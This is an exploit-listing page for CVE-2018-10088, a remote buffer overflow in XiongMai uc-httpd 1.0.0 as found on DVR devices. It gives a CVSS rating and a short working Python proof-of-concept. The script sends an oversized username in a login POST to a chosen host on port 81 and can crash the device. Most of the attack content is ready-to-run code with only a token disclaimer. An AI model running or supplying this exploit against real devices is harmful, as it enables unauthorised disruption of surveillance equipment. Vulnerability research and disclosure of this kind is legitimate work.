XiongMai uc-httpd 1.0.0 Buffer Overflow

2018.06.12
Credit: Andrew Watson
Risk: High
Local: No
Remote: Yes
CWE: CWE-119


CVSS Base Score: 10/10
Impact Subscore: 10/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

# Exploit Title: XiongMai uc-httpd 1.0.0 - Buffer Overflow # Date: 2018-06-08 # Exploit Author: Andrew Watson # Software Version: XiongMai uc-httpd 1.0.0 # Vendor Homepage: http://www.xiongmaitech.com/en/ # Tested on: KKMoon DVR running XiongMai uc-httpd 1.0.0 on TCP/81 # CVE ID: CVE-2018-10088 # DISCLAIMER: This proof of concept is provided for educational purposes only! #!/usr/bin/python import socket import sys payload="A" * 85 print "\n###############################################" print "XiongMai uc-httpd 1.0.0 Buffer Overflow Exploit" if len(sys.argv) < 2: print "\nUsage: " + sys.argv[0] + " <Host>\n" sys.exit() print "\nTarget: " + sys.argv[1] print "Sending exploit..." s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((sys.argv[1],81)) s.send('POST /login.htm HTTP/1.1\r\n') s.send('command=login&username=' + payload + '&password=PoC\r\n\r\n') s.recv(1024) s.close() print "\nExploit complete!"


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top